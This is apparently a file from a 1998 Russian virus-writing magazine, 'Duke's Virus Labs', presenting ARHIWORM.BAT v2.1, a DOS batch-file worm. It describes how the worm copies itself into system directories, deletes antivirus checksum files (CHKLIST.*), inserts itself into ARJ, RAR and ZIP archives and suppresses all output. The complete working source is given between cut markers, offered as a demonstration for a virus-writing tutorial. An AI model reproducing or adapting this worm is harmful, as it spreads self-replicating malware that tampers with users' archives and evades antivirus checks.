Magazine "Duke's Virus Labs"          Number 01          File 011
 ▄▄▄▄▄▄  ▄▄▄▄▄    ▄       ▄  ▄▄▄                  ▄▄▄▄▄   ▄▄▄▄▄▄
          █  ▀█▄  █       █   █          █  █       █
 ▀▀▀▀▀▀   █    █  ▀█     █▀   █        ▀▀█▀▀█▀▀     █     ▀▀▀▀▀▀
 ▄▄▄▄▄▄   █    █   ██   ██    █        ▄▄█▄▄█▄▄     █     ▄▄▄▄▄▄
          █  ▄█▀    █▄ ▄█     █    ▄█    █  █       █
 ▀▀▀▀▀▀  ▀▀▀▀▀       ▀▀▀     ▀▀▀▀▀▀▀              ▀▀▀▀▀   ▀▀▀▀▀▀

                       BAT.ARHIVORM v2.1

Имя вируса    : ARHIWORM.BAT v2.1
Автор         : Duke/SMF
Тип           : worm  (червь)
Дата создания : 9.06.98
Длина         : 555 байт
Язык          : DOS-команды
Поражает      : ARJ, RAR, ZIP - архивы

Вирус представляет собой файл ARHIWORM.BAT. Он  копирует  себя  в
каталоги:
  c:\windows\
  c:\win95\
  c:\dos\
  c:\  (он есть всегда)
  ..\  (надкаталог, есть почти всегда)
Ставка сделана на то, что это  самые  распространенные  каталоги.
Если же их нет, то работоспособность вируса все равно  сохраняет-
ся и на экран ничего не выводится.
Вирус является "опасным", поскольку удаляет файлы CHKLIST.*
Поражает файлы-архивы ARJ, RAR, ZIP.
Не выдает сообщений на экран (никаких :). Содержит строку-коммен-
тарий:

 ARHIWORM.BAT v2.1 - file's worm  (c) by Duke [SMF] 9.06.98

Вирус создан в качестве  демонстрационного  к  статье  "BAT-virii
tutorial by Duke". В этой статье он будет рассмотрен  более  под-
робно. Ни одному из антивирусов вирус не известен.  Далее  приво-
дится текст вируса.

===== Cut here =====
@echo off
if "%1=="#r goto rar
if "%1=="#z goto zip
if "%1=="#a goto arj
ctty nul
copy %0 c:\dos\%0
copy %0 c:\windows\%0
copy %0 c:\win95\%0
copy %0 c:\%0
copy %0 ..\%0
del chklist.*
ctty con
for %%r in (*.rar) do call %0 #r %%r
for %%z in (*.zip) do call %0 #z %%z
for %%a in (*.arj) do call %0 #a %%a
goto end
:rar
attrib -r %2
rar a -tk -y -c- -o+ %2 %0 >nul
goto end
:zip
attrib -r %2
pkzip %2 %0 >nul
goto end
:arj
attrib -r %2
arj a %2 %0 >nul
:end
rem ARHIWORM.BAT v2.1 - file's worm  (c) by Duke [SMF] 9.06.98
echo on
===== Cut here =====
-------------------------<end of file>---------------------------
